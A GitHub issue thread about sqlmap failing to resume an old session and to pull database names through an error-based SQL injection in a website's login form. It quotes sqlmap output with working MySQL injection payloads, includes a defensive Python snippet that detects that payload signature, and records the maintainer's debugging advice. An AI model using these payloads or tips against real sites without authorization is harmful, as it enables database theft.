
Old session not working #3799

Closed
jofray opened this issue Jul 5, 2019 · 4 comments
Comments

@jofray

jofray commented Jul 5, 2019

Describe the bug
I tried running sqlmap 1.2.25#stable (installed with brew) on a vulnerable website and got a valid injection point. Fetching a row from a table was taking time, so I decided to update sqlmap using brew upgrade sqlmap (running 1.3.7#stable now). I tried running sqlmap on the same website, but the detection phase starts from scratch instead of resuming from the session.sqlite file. I tried supplying the session file with the -s argument, but that didn't work either. Could this be an issue with using a different version? I couldn't find 1.2.25, so I installed 1.2.3; it runs fine(?) with the session file. The injection is resumed, but sqlmap is never able to fetch any data. Even running with --hex or --no-cast didn't help.

Expected behavior
Perform injection successfully based on previous session?

Running environment:

  • sqlmap version 1.2.3#stable
  • git
  • Ubuntu 14.04.6 LTS
  • Python 2.7.6

Additional context

root@ubuntu~/sqlmap-1.2.3# ./sqlmap.py -r login-request --risk 3 --level 3 -s old-session.sqlite --dbs --fresh-queries
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.2.3#stable}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 01:24:56

[01:24:56] [INFO] parsing HTTP request from 'login-request'
[01:24:56] [INFO] resuming back-end DBMS 'mysql' 
[01:24:56] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.example.com/demo/'. Do you want to follow? [Y/n] n
[01:24:59] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: frm_username (POST)
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: frm_username=admin' AND ROW(8925,8813)>(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(8925=8925,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8142 UNION SELECT 5056 UNION SELECT 7147 UNION SELECT 3751)a GROUP BY x)-- Bcwi&frm_password=abcd
---
[01:24:59] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.5.32
back-end DBMS: MySQL >= 4.1
[01:24:59] [INFO] fetching database names
[01:24:59] [WARNING] the SQL query provided does not return any output
[01:24:59] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[01:24:59] [INFO] falling back to current database
[01:24:59] [INFO] fetching current database
[01:25:00] [CRITICAL] unable to retrieve the database names

[*] shutting down at 01:25:00
@stamparm
Member

stamparm commented Jul 5, 2019

A) There have been major changes inside sqlmap in preparing for Python3. Hence, the session had to be adjusted for both Python2 and Python3. The last irreversible change was with 1.3.5.2.
B) You have all tagged versions here. You can freely fetch a working version from there.

@jofray
Author

jofray commented Jul 5, 2019

Thank you for the prompt support. However, I have another question: using 1.2.3#stable I can use the session file, but sqlmap doesn't appear to exploit the vulnerability. I ran sqlmap with -v3 and the following is the output:

root@ubuntu:~/sqlmap-1.2.3# ./sqlmap.py  -r login-request -s old-session.sqlite --dbs -v3 --fresh-queries
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.3#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:52:52

[10:52:52] [INFO] parsing HTTP request from 'login-request'
[10:52:52] [DEBUG] not a valid WebScarab log data
[10:52:52] [DEBUG] cleaning up configuration parameters
[10:52:52] [DEBUG] setting the HTTP timeout
[10:52:52] [DEBUG] creating HTTP requests opener object
[10:52:52] [INFO] resuming back-end DBMS 'mysql' 
[10:52:52] [DEBUG] resolving hostname 'www.example.com'
[10:52:53] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'https://www.example.com/demo/'. Do you want to follow? [Y/n] n
[10:52:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: frm_username (POST)
    Type: error-based
    Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: frm_username=admin' AND ROW(8925,8813)>(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(8925=8925,1))),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8142 UNION SELECT 5056 UNION SELECT 7147 UNION SELECT 3751)a GROUP BY x)-- Bcwi&frm_password=a&x=0&y=0
    Vector: AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
---
[10:52:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.5.32
back-end DBMS: MySQL >= 4.1
[10:52:55] [INFO] fetching database names
[10:52:55] [PAYLOAD] admin' AND ROW(4777,5497)>(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 3415 UNION SELECT 5474 UNION SELECT 2222 UNION SELECT 9271)a GROUP BY x)-- YEom
[10:52:55] [WARNING] the SQL query provided does not return any output
[10:52:55] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:52:55] [INFO] falling back to current database
[10:52:55] [INFO] fetching current database
[10:52:55] [PAYLOAD] admin' AND ROW(5050,1203)>(SELECT COUNT(*),CONCAT(0x7171767671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x71786b6a71,FLOOR(RAND(0)*2))x FROM (SELECT 8150 UNION SELECT 5697 UNION SELECT 7914 UNION SELECT 8574)a GROUP BY x)-- EvSp
[10:52:55] [DEBUG] performed 1 queries in 0.17 seconds
[10:52:55] [CRITICAL] unable to retrieve the database names

[*] shutting down at 10:52:55

Performing the payloads given by sqlmap, I can see the data, but for some reason sqlmap always shuts down with

[10:52:55] [CRITICAL] unable to retrieve the database names

Is there a way this can be prevented?

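As an added illustration (not part of this issue or of sqlmap's own code), the [PAYLOAD] lines above follow sqlmap's MySQL FLOOR(RAND(0)*2) error-based template: the value being read is wrapped between two marker strings given as hex literals (0x7171767671 and 0x71786b6a71), and the tool then looks for those markers in the error text of the response. The Python below, with constructed request-log lines and constructed response bodies, shows the request-side signature a defender can flag and that a response without the markers (a block page, or a different page served because of the request's cookie) is indistinguishable from an empty query result to the extractor.

```python
import re

# Hex literals used as markers in the payloads quoted above.
DELIM_START_HEX = "0x7171767671"
DELIM_STOP_HEX = "0x71786b6a71"

# Request-side signature of the MySQL FLOOR(RAND(0)*2) error-based technique:
# ROW(n,m)>(SELECT COUNT(*),CONCAT(...,FLOOR(RAND(0)*2))x FROM (...)a GROUP BY x)
ERROR_BASED_RE = re.compile(
    r"ROW\(\d+,\d+\)>\(SELECT\s+COUNT\(\*\),CONCAT\(.*?FLOOR\(RAND\(0\)\*2\)\).*?GROUP\s+BY\s+x\)",
    re.IGNORECASE | re.DOTALL,
)

# Constructed proxy/WAF log lines: one benign login, one carrying the probe
# shown in the [PAYLOAD] output above.
SAMPLE_REQUEST_LOG = [
    "POST /demo/login.php frm_username=admin&frm_password=abcd",
    "POST /demo/login.php frm_username=admin' AND ROW(5050,1203)>(SELECT COUNT(*),"
    "CONCAT(0x7171767671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,54)),0x71786b6a71,"
    "FLOOR(RAND(0)*2))x FROM (SELECT 8150 UNION SELECT 5697 UNION SELECT 7914 UNION "
    "SELECT 8574)a GROUP BY x)-- EvSp&frm_password=a",
]

# Constructed response bodies: a duplicate-key error that leaks the marker-wrapped
# value, and a block page that carries no markers at all.
SAMPLE_RESPONSES = {
    "leak": "Warning: Duplicate entry 'qqvvqdemo_dbqxkjq1' for key 'group_key'",
    "blocked": "<html><body>Request blocked</body></html>",
}


def hex_literal_to_str(lit: str) -> str:
    """Decode a MySQL 0x... literal to its ASCII text, e.g. 0x7171767671 -> 'qqvvq'."""
    return bytes.fromhex(lit[2:]).decode("ascii")


def flag_error_based_requests(lines):
    """Return the 1-based indices of log lines that carry the error-based signature."""
    return [i for i, line in enumerate(lines, 1) if ERROR_BASED_RE.search(line)]


def extract_leaked_value(response_text, start_hex=DELIM_START_HEX, stop_hex=DELIM_STOP_HEX):
    """Return the text between the two markers, or None when the response has no markers
    (the situation sqlmap reports as 'the SQL query provided does not return any output')."""
    start, stop = hex_literal_to_str(start_hex), hex_literal_to_str(stop_hex)
    m = re.search(re.escape(start) + r"(.*?)" + re.escape(stop), response_text, re.DOTALL)
    return m.group(1) if m else None
```

Seeing the decoded markers ('qqvvq'/'qxkjq') in an application error page is direct evidence that data left the database, so the response-side check is worth running over error logs as well as the request-side one over traffic.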
@stamparm
Member

stamparm commented Jul 5, 2019

A) Sites tend to "patch" or "modify" stuff. You have an error-based SQLi, best one for debugging on YOUR side.
B) Please rerun everything with --fresh-queries --parse-errors -t /tmp/traffic.txt. Take a look into parsed error-messages and generated /tmp/traffic.txt. I have a feeling that something could pop out.
C) previous heuristics detected that the target is protected by some ... - please don't ask for further support as this is purely your issue
D) I would advise you to rerun everything with --flush-session after A) and B) and see if something comes out

Because of A) and C) I won't respond any more to this issue (as there was no issue in the first place)

@jofray
Author

jofray commented Jul 5, 2019

Leaving this here so that anyone having a similar issue can find it.
So the cookie was creating the issue; removing the cookie from the request seemed to solve the problem.
